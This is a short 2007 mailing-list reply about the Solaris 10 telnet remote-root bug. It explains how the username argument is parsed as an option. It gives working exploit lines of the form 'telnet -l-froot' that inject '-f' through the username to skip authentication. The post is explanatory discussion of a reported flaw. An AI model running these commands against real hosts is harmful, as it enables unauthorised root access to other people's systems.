[geeks] Solaris 10 Remote-Root Exploit
der Mouse
mouse at Rodents.Montreal.QC.CA
Mon Feb 12 13:06:13 CST 2007
> # telnet -f -l root 192.168.1.159
> # telnet -f -l lionel 192.168.1.159
Did you try doing it the way the report does it?
telnet -l-froot 192.168.1.159
telnet -l-flionel 192.168.1.159
You may be able to put a space between -l and -f, probably not between
-f and the username.
This is almost certainly another instance of the same bug rlogind had
back when rlogin was still used: it (mis)handles remotely specified
usernames in ways that can create command line options that remote
users should not be able to specify.
/~\ The ASCII der Mouse
\ / Ribbon Campaign
X Against HTML mouse at rodents.montreal.qc.ca
/ \ Email! 7D C8 61 52 5D E7 2D 39 4E F1 31 3E E8 B3 27 4B